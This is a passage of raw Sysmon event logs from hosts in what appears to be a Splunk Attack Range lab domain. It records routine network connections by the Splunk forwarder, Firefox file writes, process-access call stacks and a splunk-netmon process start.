Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57131-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000805710Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:23.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B45315413DE1B814755FBE9AFDAFF656,SHA256=A6582118738CED8B8479E02C6B613E2670CF197D97D2BBD9E3ECACCA84B74EB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001045509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:15.756{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50878-false10.0.1.12-8000- 23542300x80000000000000001045508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CA4D6104E819A88412E05BA7D8C50D9D,SHA256=61FC1B5DC4E51C242E227263DE04DBFE21CB17708DCE4D5E882F25471E124191,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.597{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C29D6ED0737A3B748811F1A336531480,SHA256=A8CBF5B4372EF171380BCB10C6C890F79B8DD3BBB6E5FBBCE13E379ABF171F6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=04F1483EB500F7DD5DBFCB7E81C66B30,SHA256=D4C50DF4E733C42E32CD034B5835FEF7F2B5DE98A642DA0EA4EEF030F15B49E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE5AB7E61AF0F3DE5FBB6FF4B849DEDF,SHA256=8E851FF5DF60BE84AD1F9B65BED48310082BC6D293321D694A3EF749D6A115F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=55030877845160C36324D191D140078C,SHA256=E8912AD66F83B605A72A81017E5FF3B2ABAB7EE265A12CC5068304D1C4F352D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=964C3FEC98E97ABA6FDF704D588DF532,SHA256=52753C9740F5615179FFE924AC746AE6310C0A6A24F4FA361F643A21BAFC63FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.582{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12565593B8B39100395CED136B1C853A,SHA256=B1B4FDA69CD1608DAA622DDA8E6F607DE85459FC751334E02D5561B0C5AF117F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=692BCE6277272CD8850B3A4F6AF96D31,SHA256=AFFE021C26EDD1C32AE538D1256ED9449AADAD3B32702B75AA5BA4BCA54C0D8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE713F5D008133E2C57A986B3BFDC51B,SHA256=7315FDA825B39F94D09A4C3C3DF547FA26325889E2B71C82A52576DD5628062C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF3093BCD820CB24E9AAC36B1CA8A81F,SHA256=2E8D846228239446FED20C7CEDE0CBF2CCAD98B1550CEAAACBF7DD9D0AD2F196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4D0FFB1CAEC8B7011519BBBF0A785BBE,SHA256=E1349C7F2B5EDDF1C1A43E816F8AC4ABF44886DA7F62160F32223CD7B88ED852,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.566{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09BF2AC8B3EEA61B2E295A7990FFEE1C,SHA256=0D5FEE5D92AC7AA44120276EB8909AA80D34F3E28B8ABF4E435B919CB0FD2946,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8115E1DDDC577B4525039501D885A2A5,SHA256=C9C4E3E383BF7AAA7699D396AA111F6D2E3BEC650B964979C361B0589B027142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=246BBD7D35447F27A53D7AC39A11BDE3,SHA256=E856245818F7D48949E92EF5824C103291D6277DD5AF4531087A2F7950F40AC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E9A693C0C475C63677A1390620BEB866,SHA256=B1CB0280987030EC8AFFEB30CFC9EEE44E26C17C4E032F995AA24BBDD7534D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=240BB9AA5BFD2F0FF4DF287D61B3F5B2,SHA256=D3BF746D71FC600759CFC15D33C4F6FF1AD8A76E970E32428249D7775D62A11F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A2E3AB6BA19DE38ECDF0BB634C4D2F6,SHA256=1CD1852FEE81A3545C852CCEC78D4C1379D1A1AF8E7C5102A915E7330DF16EB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E2C7DCF0CB87DB81F61A4B5FBE6F333A,SHA256=0D0370F9CDCD478D20BF88B1BFD416138A37BD72892ABC8202C732FB79C907DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9B3EC857B0ABFD9E75264ACB923AFA7,SHA256=B0C51B59DA5F08CDCAD7B227A9F1840C909D9F33FB01B80809EC4B2B371FEDFC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7A5255A9AA5BB65A34C76103971F010E,SHA256=6E459AEDB557904224352426DED7743F7F36D792E7D6C6AD1F9A1C1F3BE05D61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4F6C7A0A4D033B01AA9CCB838420ACAE,SHA256=590DF34EE1706829242A2BFDDA1564D393D078B1FF8617A8ABFD449A32E36FFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.550{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DF96051058A603AE0207DE636EC8B266,SHA256=57F57EDB02886535037E10C6D21C40B200E7DD61633DD2235A749075142C9CE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001045486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:23.297{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11B6CFAD0ECF325F6A8436F957EDA816,SHA256=7F73BC224372F6702EECE5B2D6D2BE22550D663AD11390D4444C972ABEFCF818,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000805709Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:22.286{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57132-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001045510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:42:24.318{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E39589DE81FCA5EC37CE50416B63C49,SHA256=04EC0C0E9EEE4C467EC9064BA6CC23755003EE9F4E56C99CDEB2CFF4B63742B9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000805737Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805736Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805735Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805734Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805733Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805732Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805731Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.919{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805730Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805729Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805728Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000805727Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000805726Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.903{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000805725Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:42:24.904{0C1E0330-F260-60EB-2E79-00000000D001}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 